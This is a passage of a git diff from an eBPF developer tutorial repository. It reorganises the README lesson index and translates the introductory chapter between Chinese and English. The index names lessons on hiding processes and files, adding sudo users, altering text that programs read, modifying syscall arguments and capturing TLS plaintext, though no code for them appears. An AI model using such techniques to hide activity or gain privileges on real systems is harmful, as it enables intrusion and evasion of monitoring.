程序进行的潜在攻击和防御以及复杂的追踪。结合用户模式和内核模式的 eBPF 可以带来强大的能力(也可能带来安全风险)。 Android: -- [在 Android 上使用 eBPF 程序](src/22-android/README.md) +- [lesson 22-android](src/22-android/README.zh.md) 在 Android 上使用 eBPF 程序 +网络: -网络和追踪: +- [lesson 23-http](src/23-http/README.zh.md) 通过 eBPF socket filter 或 syscall trace 追踪 HTTP 请求等七层协议 - eBPF 实践教程 +- [lesson 29-sockops](src/29-sockops/README.zh.md) eBPF 开发实践:使用 sockops 加速网络请求转发 +- [lesson 41-xdp-tcpdump](src/41-xdp-tcpdump/README.zh.md) eBPF 示例教程:使用 XDP 捕获 TCP 信息 +- [lesson 42-xdp-loadbalancer](src/42-xdp-loadbalancer/README.zh.md) eBPF 开发者教程: 简单的 XDP 负载均衡器 +安全: -- [使用 uprobe 捕获多种库的 SSL/TLS 明文数据](src/30-sslsniff/README.md) -- [使用 eBPF socket filter 或 syscall trace 追踪 HTTP 请求和其他七层协议](src/23-http/README.md) -- [使用 sockops 加速网络请求转发](src/29-sockops/README.md) +- [lesson 24-hide](src/24-hide/README.zh.md) eBPF 开发实践:使用 eBPF 隐藏进程或文件信息 +- [lesson 25-signal](src/25-signal/README.zh.md) eBPF 入门实践教程:用 bpf_send_signal 发送信号终止恶意进程 +- [lesson 26-sudo](src/26-sudo/README.zh.md) 使用 eBPF 添加 sudo 用户 +- [lesson 27-replace](src/27-replace/README.zh.md) 使用 eBPF 替换任意程序读取或写入的文本 +- [lesson 28-detach](src/28-detach/README.zh.md) 在应用程序退出后运行 eBPF 程序:eBPF 程序的生命周期 +- [lesson 34-syscall](src/34-syscall/README.zh.md) eBPF 
开发实践:使用 eBPF 修改系统调用参数
+调度器:
-
+- [lesson 44-scx-simple](src/44-scx-simple/README.zh.md) BPF 调度器简介
+其他:
-
-- [使用 eBPF 修改系统调用参数](src/34-syscall/README.md)
-- [使用 eBPF 隐藏进程或文件信息](src/24-hide/README.md)
-- [使用 bpf_send_signal 发送信号终止进程](src/25-signal/README.md)
-- [使用 eBPF 添加 sudo 用户](src/26-sudo/README.md)
-- [使用 eBPF 替换任意程序读取或写入的文本](src/27-replace/README.md)
-- [BPF 的生命周期:使用 Detached 模式在用户态应用退出后持续运行 eBPF 程序](src/28-detach/README.md)
-- [eBPF 运行时的安全性与面临的挑战](src/18-further-reading/ebpf-security.zh.md)
-
-其他高级特性:
-
-- [eBPF开发实践:使用 user ring buffer 向内核异步发送信息](src/35-user-ringbuf/README.md)
-- [用户空间 eBPF 运行时:深度解析与应用实践](src/36-userspace-ebpf/README.md)
-- [借助 eBPF 和 BTF,让用户态也能一次编译、到处运行](src/38-btf-uprobe/README.md)
+- [lesson 35-user-ringbuf](src/35-user-ringbuf/README.zh.md) eBPF 开发实践:使用 user ring buffer 向内核异步发送信息
+- [lesson 36-userspace-ebpf](src/36-userspace-ebpf/README.zh.md) 用户空间 eBPF 运行时:深度解析与应用实践
+- [lesson 38-btf-uprobe](src/38-btf-uprobe/README.zh.md) 借助 eBPF 和 BTF,让用户态也能一次编译、到处运行
+- [lesson 43-kfuncs](src/43-kfuncs/README.zh.md) 超越 eBPF 的极限:在内核模块中定义自定义 kfunc
 
 持续更新中...
@@ -152,11 +145,11 @@ TIME COMM TID LAT(us)
 本地编译示例如下所示:
 
 ```shell
-$ git clone https://github.com/eunomia-bpf/bpf-developer-tutorial.git
-$ cd bpf-developer-tutorial
-$ git submodule update --init --recursive # 同步 submodule 子模块
-$ cd src/24-hide
-$ make
+git clone https://github.com/eunomia-bpf/bpf-developer-tutorial.git
+cd bpf-developer-tutorial
+git submodule update --init --recursive # 同步 submodule 子模块
+cd src/24-hide
+make
 ```
 
 ## 为什么需要基于 libbpf 和 BPF CO-RE 的教程?
diff --git a/src/0-introduce/README.md b/src/0-introduce/README.md
index 687bfd9..77ed02e 100644
--- a/src/0-introduce/README.md
+++ b/src/0-introduce/README.md
@@ -1,163 +1,162 @@
-# eBPF 示例教程 0:核心概念与工具简介
-
-这是一个全面的 eBPF 开发教程的第一部分,旨在通过实用的 eBPF 开发指导您从初学者到高级用户。它涵盖了基本概念、实际代码示例以及在现代系统中的应用。我们将不再专注于传统工具如 BCC,而是使用现代框架如 `libbpf`、`Cilium`、`libbpf-rs` 和 eunomia-bpf,并提供 `C`、`Go` 和 `Rust` 的示例。
-
-本教程的主要目标是提供清晰简洁的 eBPF 工具示例(起步只需 20 行代码!),帮助开发者快速掌握基本的 eBPF 开发技术。每个示例都是独立的,可以在目录结构中找到,每个目录代表一个独立的 eBPF 工具。您还可以访问我们的教程代码仓库 或网站 获取更多示例和完整的教程源代码。
-
-## eBPF 简介:安全高效的内核扩展
-
-eBPF(扩展的 Berkeley Packet Filter)是一项突破性的技术,允许开发者在内核空间中安全高效地运行小型程序。与传统方法需要修改内核源代码或加载新模块不同,eBPF 使得动态定制和优化网络行为成为可能,且不会中断系统操作。这种灵活性和高效性使 eBPF 成为克服传统网络栈限制的关键技术。
-
-### eBPF 的强大之处是什么?
- -- **直接内核交互**:eBPF 程序在内核中执行,与系统级事件如网络包、系统调用或追踪点交互。 -- **安全执行**:eBPF 通过验证器在程序运行前检查其逻辑,防止潜在的内核崩溃或安全漏洞。 -- **最低开销**:eBPF 通过使用即时编译器(JIT),将 eBPF 字节码转换为针对特定架构的优化机器码,实现近原生执行速度。 - -## eBPF:过去、现在与未来 - -### 过去:可编程网络的变革 - -eBPF 于 2014 年推出,彻底改变了开发者处理网络的方式,允许小型可编程内核空间应用程序实时处理数据包。通过钩住关键内核点,eBPF 使得在网络包到达时应用自定义逻辑成为可能,从而提高了效率和灵活性。这使得组织能够在不需要自定义驱动程序或修改内核的情况下定制网络行为,为云原生和数据中心环境创造了理想的解决方案。 - -### 现在:满足现代计算需求的多功能框架 - -eBPF 已发展为一个多功能框架,超越了其最初的网络用途,现在涵盖了可观测性、追踪、安全性,甚至系统资源管理。eBPF 程序可以动态钩住内核事件,赋予开发者精确控制系统行为和性能优化的能力,而无需修改内核或重启系统。这使得 eBPF 成为系统管理员和开发者监控、优化和保护环境的必备工具。 - -以下是 eBPF 目前广泛应用的一些关键领域: - -- **网络**:eBPF 提供内核中实时、高速的数据包过滤和处理,允许创建自定义协议解析器和网络策略,无需新驱动程序或系统重启。这在云和数据中心环境中实现了高效的网络管理。 - -- **可观测性**:eBPF 使开发者能够通过收集自定义指标和执行内核级数据聚合来深入了解系统行为。通过利用内核追踪点和函数调用,eBPF 有助于识别性能问题和定位难以发现的错误。 - -- **追踪与分析**:eBPF 提供强大的追踪和分析能力,通过附加到内核函数、追踪点甚至用户空间探针,使开发者能够深入了解系统和应用程序的行为,从而优化性能和解决复杂的系统问题。 - -- **安全**:eBPF 在实时安全监控中发挥重要作用。它能够深入检查系统调用、网络流量和其他内核活动,帮助执行动态安全策略和检测异常行为,为基础设施提供高效的保护。 - -- **调度器优化**:eBPF 越来越多地用于增强 CPU 调度,能够监控 CPU 负载并优化任务在核心之间的分配。这可以更有效地利用 CPU 资源,提高系统响应能力。 - -- **HID(人机接口设备)驱动增强**:开发者使用 eBPF 优化键盘、鼠标和触摸屏等设备的 HID 驱动程序。通过为处理输入事件添加自定义逻辑,eBPF 提高了对延迟敏感应用的响应速度。 - -各行业组织已大规模采用 eBPF: - -- **Google**:使用 eBPF 进行安全审计、数据包处理、实时性能监控以及优化其庞大基础设施的 CPU 调度。 -- **Netflix**:利用 eBPF 进行网络流量分析,确保流媒体服务的高可用性和性能。 -- **Android**:应用 eBPF 优化网络使用、功耗和资源分配,提升数百万设备的性能和电池寿命。 -- **S&P Global**:通过 **Cilium** 使用 eBPF 管理跨多个云和本地系统的网络,确保可扩展性和安全性。 -- **Shopify**:与 **Falco** 一起实施 eBPF 进行入侵检测,增强其电子商务平台的安全性。 -- **Cloudflare**:使用 eBPF 进行网络可观测性、安全监控和性能优化,保护全球数百万网站。 - -eBPF 能够动态调整系统行为并扩展到用户空间,使其成为现代计算不可或缺的技术。无论是优化网络流量、提升安全性,还是增强系统性能,eBPF 都能帮助开发者高效、安全地应对实时需求。 - -除了其内核模式运行时,eBPF 还可以扩展到用户空间。例如,[bpftime](https://github.com/eunomia-bpf/bpftime) 是一个用户空间 eBPF 运行时,允许在用户空间应用中进行高性能追踪、性能分析和插件支持。这种 eBPF 向用户空间的扩展有助于在各种超越内核级任务的用例中提高灵活性和性能。 - -### 未来:eBPF 的扩展潜力 - -展望未来,预计 eBPF 将成为操作系统更为重要的一部分。重点将放在提升其灵活性、模块化和易用性上,使其能够应用于更广泛的场景。内存管理、并发机制的创新以及与用户空间应用的更好集成已在路上。已经有项目在编译 Linux 内核的关键部分到 BPF 指令集,这可能彻底改变内核开发和分析的方式。 - -动态栈、更好的用户空间可观测性工具(例如快速 Uprobes 和特定语言的栈行走器)以及更安全的程序终止机制等进展将继续增强 eBPF 的可靠性并扩展其使用场景。此外,新工具和库将简化 eBPF 开发,降低内核和应用开发者的入门门槛。 - -## 开始学习教程 - -本教程提供实用的 eBPF 开发实践,涵盖从初级到高级的主题。我们专注于在可观测性、网络和安全等领域的动手示例,使用 `libbpf`、`libbpf-rs` 和 `eunomia-bpf` 等框架,并提供 C、Go 和 Rust 的示例。 - -### 本教程适合谁? - -- **开发者** 希望实现自定义内核解决方案。 -- **系统管理员** 旨在提升性能和安全性。 -- **技术爱好者** 探索前沿的内核技术。 - -### 你将学到什么? - -- **核心概念**:eBPF 基础知识及其与 Linux 内核的集成。 -- **实用技能**:编写和部署 eBPF 程序。 -- **高级主题**:探索 eBPF 在安全、追踪和未来创新方面的应用。 - ---- - -## 目录 - -1. **eBPF 简介** - 基本概念和入门所需的工具。 - -2. **初学者示例** - 简单的程序,如“Hello World”及使用 kprobe 和 uprobe 进行基础追踪。 - -3. **可观测性** - 侧重于使用 eBPF 监控网络流量、文件操作和进程行为的示例。 - -4. **网络** - 侧重于修改和优化网络流量的示例,如 XDP、TC 和 socket。 - -5. **安全** - 用于隐藏进程和文件、发送信号杀死进程以及跟踪进程事件以增强安全性的程序。 - -6. **高级用例** - 涉及性能分析、调度器优化和用户空间 eBPF(如 bpftime)的复杂示例。 - -7. 
**深入主题** - 探索 eBPF 在 Android 上的应用、使用 eBPF 进行网络加速以及通过系统调用修改来保护系统。 - -## 如何使用 eBPF 编程 - -从头编写 eBPF 程序可能较为复杂。为简化这一过程,LLVM 于 2015 年引入了将高级语言代码编译为 eBPF 字节码的能力。自那时起,eBPF 社区构建了像 `libbpf` 这样的库来管理这些程序。这些库帮助将 eBPF 字节码加载到内核中并执行基本任务。Linux 内核源代码中 `samples/bpf/` 目录包含了众多 eBPF 示例。 - -典型的 eBPF 程序包含两个部分:内核空间代码(`*_kern.c`)和用户空间代码(`*_user.c`)。内核空间代码定义逻辑,而用户空间代码负责加载和与内核交互。然而,像 `libbpf-bootstrap` 和 Go eBPF 库这样的工具简化了这一过程,允许一次性编译和更容易的开发。 - -### eBPF 开发工具 - -- **BCC**:一个基于 Python 的工具链,简化了 eBPF 程序的编写、编译和加载。它提供了许多预构建的追踪工具,但在依赖和兼容性方面存在一些限制。 -- **eBPF Go 库**:一个 Go 库,解耦了获取 eBPF 字节码的过程与加载和管理 eBPF 程序的过程。 -- **libbpf-bootstrap**:基于 `libbpf` 的现代脚手架,提供了高效的工作流用于编写 eBPF 程序,提供简单的一次性编译过程以生成可重用的字节码。 -- **eunomia-bpf**:一个用于编写仅包含内核空间代码的 eBPF 程序的工具链。它通过动态加载 eBPF 程序简化了 eBPF 程序的开发。 - -这些工具有助于减少开发 eBPF 程序的复杂性,使开发者更容易优化系统性能、安全性和可观测性。 - -## 学习 eBPF 开发的一些技巧 - -本文不会提供更详细的 eBPF 原理介绍,但以下是一个学习计划和参考资料,可能对您有帮助: - -### eBPF 简介(5-7 小时) - -- 使用 Google 或其他搜索引擎搜索:eBPF -- 询问类似 ChatGPT 的工具:什么是 eBPF? - -推荐: - -- 阅读 eBPF 介绍:(30 分钟) -- 简要了解 eBPF 内核相关文档:(了解技术细节的查询来源,30 分钟) - -回答三个问题: - -1. 了解 eBPF 是什么?我们为什么需要它?难道不能使用内核模块吗? -2. 它有哪些功能?它在 Linux 内核中能做什么?eBPF 程序和助手函数有哪些类型(不需要全部了解,但需要知道在哪里查找)? -3. 它能用于哪些场景?例如,可以在哪些情况下使用?网络、安全、可观测性? - -### 理解如何开发 eBPF 程序(10-15 小时) - -了解并尝试 eBPF 开发框架: - -- bpftrace 教程:(尝试,1 小时) -- 使用 BCC 开发各种工具的示例:(运行,3-4 小时) -- libbpf 的一些示例:(运行任何有趣的示例并阅读源代码,2 小时) -- 教程:(阅读第 1-10 部分,3-4 小时) - -其他开发框架:Go 或 Rust 语言,请自行搜索和尝试(0-2 小时) - -如果有问题或想了解的内容,无论是否与本项目相关,都可以在该项目的讨论区开始讨论。 - -回答一些问题并尝试一些实验(2-5 小时): - -1. 如何开发最简单的 eBPF 程序? -2. 如何使用 eBPF 追踪内核功能或函数?有很多方法,提供相应的代码示例; -3. 用户模式和内核模式之间的通信解决方案有哪些?如何将信息从用户模式发送到内核模式?如何将信息从内核模式传递到用户模式?提供代码示例; -4. 编写您自己的 eBPF 程序以实现某个功能; -5. 在 eBPF 程序的整个生命周期中,用户模式和内核模式分别做了什么? - -## 参考资料 - -- eBPF 介绍: -- BPF 编译器集合(BCC): -- eunomia-bpf: - -您还可以访问我们的教程代码仓库 或网站 获取更多示例和完整的教程源代码。所有内容均为开源。我们将继续分享更多关于 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术。 \ No newline at end of file +# eBPF Tutorial by Example 0: Introduction to Core Concepts and Tools + +This is the first part of a comprehensive development tutorial for eBPF, designed to guide you through practical eBPF development, from beginner to advanced. It covers fundamental concepts, real-world code examples, and applications in modern systems. Rather than focusing on traditional tools like BCC, we will use modern frameworks such as `libbpf`, `Cilium`, `libbpf-rs`, and eunomia-bpf, with examples provided in `C`, `Go`, and `Rust`. + +The primary goal of this tutorial is to provide clear and concise examples of eBPF tools (starting with as little as 20 lines of code!) to help developers quickly grasp essential eBPF development techniques. Each example is self-contained and can be found in the directory structure, with every directory representing an independent eBPF tool. You can also visit our tutorial code repository or website for more examples and complete tutorial source code. + +## Introduction to eBPF: Secure and Efficient Kernel Extension + +eBPF (extended Berkeley Packet Filter) is a groundbreaking technology that allows developers to run small programs directly in kernel space, safely and efficiently. Unlike traditional approaches that required modifying kernel source code or loading new modules, eBPF made it possible to customize and optimize network behavior dynamically, all without disrupting system operations. This flexibility and efficiency made eBPF a pivotal technology for overcoming the limitations of traditional networking stacks. + +### What Makes eBPF So Powerful? 
+ +- **Direct Kernel Interaction:** eBPF programs execute within the kernel, interacting with system-level events such as network packets, system calls, or tracepoints. +- **Safe Execution:** eBPF ensures safety through a verifier that checks the logic of the program before it runs, preventing potential kernel crashes or security breaches. +- **Minimal Overhead:** eBPF achieves near-native execution speed by employing a Just-In-Time (JIT) compiler, which translates eBPF bytecode into optimized machine code for the specific architecture. + +## eBPF: Past, Present, and Future + +### Past: Programmable Networking Transformed + +When eBPF was introduced in 2014, it revolutionized how developers approached networking by allowing small, programmable kernel-space applications to handle packet processing in real time. By hooking into key kernel points, eBPF enabled custom logic to be applied whenever a network packet arrived, leading to higher efficiency and flexibility. This allowed organizations to tailor networking behavior without the overhead of custom drivers or kernel modifications, creating an ideal solution for cloud-native and data-center environments. +### Present: A Versatile Framework for Modern Computing Needs + +eBPF has evolved into a versatile framework that extends beyond its original purpose of networking, now encompassing observability, tracing, security, and even system resource management. eBPF programs can dynamically hook into kernel events, giving developers precise control over system behavior and performance optimization without requiring kernel modifications or reboots. This makes eBPF an essential tool for system administrators and developers who aim to monitor, optimize, and secure their environments. + +Here are some key areas where eBPF is widely used today: + +- **Networking:** eBPF offers real-time, high-speed packet filtering and processing within the kernel, allowing for the creation of custom protocol parsers and network policies without needing new drivers or system restarts. This enables highly efficient network management in cloud and data center environments. + +- **Observability:** eBPF enables developers to gather detailed insights into system behavior by collecting custom metrics and performing in-kernel data aggregation. By tapping into kernel tracepoints and function calls, eBPF helps identify performance issues and track down elusive bugs. + +- **Tracing & Profiling:** eBPF provides powerful tracing and profiling capabilities by attaching to kernel functions, tracepoints, and even user-space probes. This allows developers to gain deep insights into system and application behavior, enabling them to optimize performance and resolve complex system issues. + +- **Security:** eBPF plays a vital role in real-time security monitoring. It enables deep inspection of system calls, network traffic, and other kernel activities, helping to enforce dynamic security policies and detect anomalous behavior, providing an efficient way to safeguard infrastructure. + +- **Scheduler Optimization:** eBPF is increasingly used to enhance CPU scheduling, offering the ability to monitor CPU load and optimize how tasks are distributed across cores. This can lead to more efficient use of CPU resources and improved system responsiveness. + +- **HID (Human Interface Device) Driver Enhancements:** Developers use eBPF to optimize HID drivers for devices like keyboards, mice, and touchscreens. 
By adding custom logic for handling input events, eBPF improves responsiveness in latency-sensitive applications. + +Organizations across industries have adopted eBPF at scale: + +- **Google:** Uses eBPF for security auditing, packet processing, real-time performance monitoring, and optimizing CPU scheduling across its vast infrastructure. +- **Netflix:** Leverages eBPF for network traffic analysis, ensuring high availability and performance for streaming services. +- **Android:** Applies eBPF to optimize network usage, power consumption, and resource allocation, improving performance and battery life on millions of devices. +- **S&P Global:** Utilizes eBPF through **Cilium** for managing networking across multiple clouds and on-premises systems, ensuring scalability and security. +- **Shopify:** Implements eBPF with **Falco** for intrusion detection, bolstering security on its e-commerce platform. +- **Cloudflare:** Uses eBPF for network observability, security monitoring, and performance optimization, protecting millions of websites globally. + +eBPF's ability to dynamically adjust system behavior and extend into user space makes it an essential technology for modern computing. Whether it's optimizing network traffic, improving security, or enhancing system performance, eBPF enables developers to address real-time requirements efficiently and safely. + +In addition to its kernel-mode runtime, eBPF can also be extended to user space. For example, [bpftime](https://github.com/eunomia-bpf/bpftime), a user-space eBPF runtime, allows for higher-performance tracing, performance analysis, and plugin support in user-space applications. This extension of eBPF into user space helps improve flexibility and performance in various use cases that go beyond kernel-level tasks. + +### Future: The Expanding Potential of eBPF + +Looking forward, eBPF is expected to become an even more integral part of operating systems. The focus is on improving its flexibility, modularity, and ease of use, making it accessible for an even broader range of applications. Innovations in memory management, concurrency mechanisms, and better integration with user-space applications are on the horizon. Projects are already underway to compile significant parts of the Linux kernel to the BPF instruction set, potentially revolutionizing how kernel development and analysis are performed. + +Advancements such as dynamic stacks, better observability tools for user space (e.g., Fast Uprobes and language-specific stack walkers), and safer program termination mechanisms will continue to strengthen eBPF’s reliability and expand its use cases. Additionally, new tools and libraries will simplify eBPF development, lowering the barrier to entry for both kernel and application developers. + +## Getting Started with the Tutorial + +This tutorial provides practical eBPF development practices, covering topics from beginner to advanced levels. We focus on hands-on examples in areas like observability, networking, and security, using frameworks like `libbpf`, `libbpf-rs`, and `eunomia-bpf`, with examples in C, Go, and Rust. + +### Who Is This Tutorial For? + +- **Developers** looking to implement custom kernel solutions. +- **System Administrators** aiming to enhance performance and security. +- **Tech Enthusiasts** exploring cutting-edge kernel technologies. + +### What Will You Learn? + +- **Core Concepts:** eBPF fundamentals and integration with the Linux kernel. +- **Practical Skills:** Writing and deploying eBPF programs. 
+- **Advanced Topics:** Exploring security, tracing, and future innovations in eBPF.
+
+---
+
+## Table of Contents
+
+1. **Introduction to eBPF**
+   Basic concepts and the tools you need to get started.
+
+2. **Beginner Examples**
+   Simple programs such as "Hello World" and basic tracing using kprobe and uprobe.
+
+3. **Observability**
+   Examples focused on monitoring network traffic, file operations, and process behavior using eBPF.
+
+4. **Networking**
+   Examples focused on modifying and optimizing network traffic, such as XDP, TC, and socket.
+
+5. **Security**
+   Programs for hiding processes and files, sending signals to kill processes, and tracking process events for security.
+
+6. **Advanced Use Cases**
+   Complex examples involving performance profiling, scheduler optimization, and eBPF in user space (e.g., bpftime).
+
+7. **In-Depth Topics**
+   Exploring eBPF for Android, using eBPF for network acceleration, and securing systems through syscall modifications.
+
+## How to Program with eBPF
+
+Writing eBPF programs from scratch can be complex. To simplify this, LLVM introduced the ability to compile high-level language code into eBPF bytecode in 2015. The eBPF community has since built libraries like `libbpf` to manage these programs. These libraries help load eBPF bytecode into the kernel and perform essential tasks. The Linux kernel source contains numerous eBPF examples in the `samples/bpf/` directory.
+
+A typical eBPF program involves two parts: kernel space code (`*_kern.c`) and user space code (`*_user.c`). The kernel space code defines the logic, while the user space code manages loading and interacting with the kernel. However, tools like `libbpf-bootstrap` and the Go eBPF library help simplify this process, allowing for one-time compilation and easier development.
+
+### Tools for eBPF Development
+
+- **BCC**: A Python-based toolchain that simplifies writing, compiling, and loading eBPF programs. It offers many pre-built tracing tools but has limitations with dependencies and compatibility.
+- **eBPF Go Library**: A Go library that decouples the process of obtaining eBPF bytecode from the loading and management of eBPF programs.
+- **libbpf-bootstrap**: A modern scaffold based on `libbpf` that provides an efficient workflow for writing eBPF programs, offering a simple one-time compilation process for reusable bytecode.
+- **eunomia-bpf**: A toolchain for writing eBPF programs with only kernel space code. It simplifies the development of eBPF programs by dynamically loading them.
+
+These tools help reduce the complexity of developing eBPF programs, making the process more accessible to developers aiming to optimize system performance, security, and observability.
+
+## Some Tips on Learning eBPF Development
+
+This article will not provide a more detailed introduction to the principles of eBPF, but here is a learning plan and reference materials that may be of value:
+
+### Introduction to eBPF (5-7h)
+
+- Google or other search engines: eBPF
+- Ask ChatGPT-like tools: What is eBPF?
+
+Recommended:
+
+- Read the introduction to eBPF: (30min)
+- Briefly understand the eBPF kernel-related documentation: (know where to query for tech details, 30min)
+
+Answer three questions:
+
+1. What is eBPF, and why do we need it? Couldn't we just use kernel modules?
+2. What functions does it have? What can it do in the Linux kernel? What are the types of eBPF programs and helpers (you don't need to know all of them, just where to find them)?
+3. What can it be used for? For example, in which scenarios can it be used? Networking, security, observability?
+
+### Understand how to develop eBPF programs (10-15h)
+
+Understand and try eBPF development frameworks:
+
+- bpftrace tutorial: (Try it, 1h)
+- Examples of developing various tools with BCC: (Run through, 3-4h)
+- Some examples of libbpf: (Run any interesting one and read the source code, 2h)
+- Tutorials: (Read part 1-10, 3-4h)
+
+Other development frameworks: Go or Rust language, please search and try on your own (0-2h)
+
+If you have questions or things you want to know, whether or not they are related to this project, you can start a thread in the discussions of this project.
+
+Answer some questions and try some experiments (2-5h):
+
+1. How to develop the simplest eBPF program?
+2. How to trace a kernel feature or function with eBPF? There are many ways; provide corresponding code examples;
+3. What are the solutions for communication between user mode and kernel mode? How to send information from user mode to kernel mode? How to pass information from kernel mode to user mode? Provide code examples;
+4. Write your own eBPF program to implement a feature;
+5. In the entire lifecycle of an eBPF program, what does it do in user mode and kernel mode?
+
+## References
+
+- eBPF Introduction:
+- BPF Compiler Collection (BCC):
+- eunomia-bpf:
+
+You can also visit our tutorial code repository or website for more examples and complete tutorial source code. All content is open source. We will continue to share more content about eBPF development practices to help you better understand and master eBPF technology.
diff --git a/src/0-introduce/README.zh.md b/src/0-introduce/README.zh.md
new file mode 100644
index 0000000..687bfd9
--- /dev/null
+++ b/src/0-introduce/README.zh.md
@@ -0,0 +1,163 @@
+# eBPF 示例教程 0:核心概念与工具简介
+
+这是一个全面的 eBPF 开发教程的第一部分,旨在通过实用的 eBPF 开发指导您从初学者到高级用户。它涵盖了基本概念、实际代码示例以及在现代系统中的应用。我们将不再专注于传统工具如 BCC,而是使用现代框架如 `libbpf`、`Cilium`、`libbpf-rs` 和 eunomia-bpf,并提供 `C`、`Go` 和 `Rust` 的示例。
+
+本教程的主要目标是提供清晰简洁的 eBPF 工具示例(起步只需 20 行代码!),帮助开发者快速掌握基本的 eBPF 开发技术。每个示例都是独立的,可以在目录结构中找到,每个目录代表一个独立的 eBPF 工具。您还可以访问我们的教程代码仓库 或网站 获取更多示例和完整的教程源代码。
+
+## eBPF 简介:安全高效的内核扩展
+
+eBPF(扩展的 Berkeley Packet Filter)是一项突破性的技术,允许开发者在内核空间中安全高效地运行小型程序。与传统方法需要修改内核源代码或加载新模块不同,eBPF 使得动态定制和优化网络行为成为可能,且不会中断系统操作。这种灵活性和高效性使 eBPF 成为克服传统网络栈限制的关键技术。
+
+### eBPF 的强大之处是什么?
+ +- **直接内核交互**:eBPF 程序在内核中执行,与系统级事件如网络包、系统调用或追踪点交互。 +- **安全执行**:eBPF 通过验证器在程序运行前检查其逻辑,防止潜在的内核崩溃或安全漏洞。 +- **最低开销**:eBPF 通过使用即时编译器(JIT),将 eBPF 字节码转换为针对特定架构的优化机器码,实现近原生执行速度。 + +## eBPF:过去、现在与未来 + +### 过去:可编程网络的变革 + +eBPF 于 2014 年推出,彻底改变了开发者处理网络的方式,允许小型可编程内核空间应用程序实时处理数据包。通过钩住关键内核点,eBPF 使得在网络包到达时应用自定义逻辑成为可能,从而提高了效率和灵活性。这使得组织能够在不需要自定义驱动程序或修改内核的情况下定制网络行为,为云原生和数据中心环境创造了理想的解决方案。 + +### 现在:满足现代计算需求的多功能框架 + +eBPF 已发展为一个多功能框架,超越了其最初的网络用途,现在涵盖了可观测性、追踪、安全性,甚至系统资源管理。eBPF 程序可以动态钩住内核事件,赋予开发者精确控制系统行为和性能优化的能力,而无需修改内核或重启系统。这使得 eBPF 成为系统管理员和开发者监控、优化和保护环境的必备工具。 + +以下是 eBPF 目前广泛应用的一些关键领域: + +- **网络**:eBPF 提供内核中实时、高速的数据包过滤和处理,允许创建自定义协议解析器和网络策略,无需新驱动程序或系统重启。这在云和数据中心环境中实现了高效的网络管理。 + +- **可观测性**:eBPF 使开发者能够通过收集自定义指标和执行内核级数据聚合来深入了解系统行为。通过利用内核追踪点和函数调用,eBPF 有助于识别性能问题和定位难以发现的错误。 + +- **追踪与分析**:eBPF 提供强大的追踪和分析能力,通过附加到内核函数、追踪点甚至用户空间探针,使开发者能够深入了解系统和应用程序的行为,从而优化性能和解决复杂的系统问题。 + +- **安全**:eBPF 在实时安全监控中发挥重要作用。它能够深入检查系统调用、网络流量和其他内核活动,帮助执行动态安全策略和检测异常行为,为基础设施提供高效的保护。 + +- **调度器优化**:eBPF 越来越多地用于增强 CPU 调度,能够监控 CPU 负载并优化任务在核心之间的分配。这可以更有效地利用 CPU 资源,提高系统响应能力。 + +- **HID(人机接口设备)驱动增强**:开发者使用 eBPF 优化键盘、鼠标和触摸屏等设备的 HID 驱动程序。通过为处理输入事件添加自定义逻辑,eBPF 提高了对延迟敏感应用的响应速度。 + +各行业组织已大规模采用 eBPF: + +- **Google**:使用 eBPF 进行安全审计、数据包处理、实时性能监控以及优化其庞大基础设施的 CPU 调度。 +- **Netflix**:利用 eBPF 进行网络流量分析,确保流媒体服务的高可用性和性能。 +- **Android**:应用 eBPF 优化网络使用、功耗和资源分配,提升数百万设备的性能和电池寿命。 +- **S&P Global**:通过 **Cilium** 使用 eBPF 管理跨多个云和本地系统的网络,确保可扩展性和安全性。 +- **Shopify**:与 **Falco** 一起实施 eBPF 进行入侵检测,增强其电子商务平台的安全性。 +- **Cloudflare**:使用 eBPF 进行网络可观测性、安全监控和性能优化,保护全球数百万网站。 + +eBPF 能够动态调整系统行为并扩展到用户空间,使其成为现代计算不可或缺的技术。无论是优化网络流量、提升安全性,还是增强系统性能,eBPF 都能帮助开发者高效、安全地应对实时需求。 + +除了其内核模式运行时,eBPF 还可以扩展到用户空间。例如,[bpftime](https://github.com/eunomia-bpf/bpftime) 是一个用户空间 eBPF 运行时,允许在用户空间应用中进行高性能追踪、性能分析和插件支持。这种 eBPF 向用户空间的扩展有助于在各种超越内核级任务的用例中提高灵活性和性能。 + +### 未来:eBPF 的扩展潜力 + +展望未来,预计 eBPF 将成为操作系统更为重要的一部分。重点将放在提升其灵活性、模块化和易用性上,使其能够应用于更广泛的场景。内存管理、并发机制的创新以及与用户空间应用的更好集成已在路上。已经有项目在编译 Linux 内核的关键部分到 BPF 指令集,这可能彻底改变内核开发和分析的方式。 + +动态栈、更好的用户空间可观测性工具(例如快速 Uprobes 和特定语言的栈行走器)以及更安全的程序终止机制等进展将继续增强 eBPF 的可靠性并扩展其使用场景。此外,新工具和库将简化 eBPF 开发,降低内核和应用开发者的入门门槛。 + +## 开始学习教程 + +本教程提供实用的 eBPF 开发实践,涵盖从初级到高级的主题。我们专注于在可观测性、网络和安全等领域的动手示例,使用 `libbpf`、`libbpf-rs` 和 `eunomia-bpf` 等框架,并提供 C、Go 和 Rust 的示例。 + +### 本教程适合谁? + +- **开发者** 希望实现自定义内核解决方案。 +- **系统管理员** 旨在提升性能和安全性。 +- **技术爱好者** 探索前沿的内核技术。 + +### 你将学到什么? + +- **核心概念**:eBPF 基础知识及其与 Linux 内核的集成。 +- **实用技能**:编写和部署 eBPF 程序。 +- **高级主题**:探索 eBPF 在安全、追踪和未来创新方面的应用。 + +--- + +## 目录 + +1. **eBPF 简介** + 基本概念和入门所需的工具。 + +2. **初学者示例** + 简单的程序,如“Hello World”及使用 kprobe 和 uprobe 进行基础追踪。 + +3. **可观测性** + 侧重于使用 eBPF 监控网络流量、文件操作和进程行为的示例。 + +4. **网络** + 侧重于修改和优化网络流量的示例,如 XDP、TC 和 socket。 + +5. **安全** + 用于隐藏进程和文件、发送信号杀死进程以及跟踪进程事件以增强安全性的程序。 + +6. **高级用例** + 涉及性能分析、调度器优化和用户空间 eBPF(如 bpftime)的复杂示例。 + +7. 
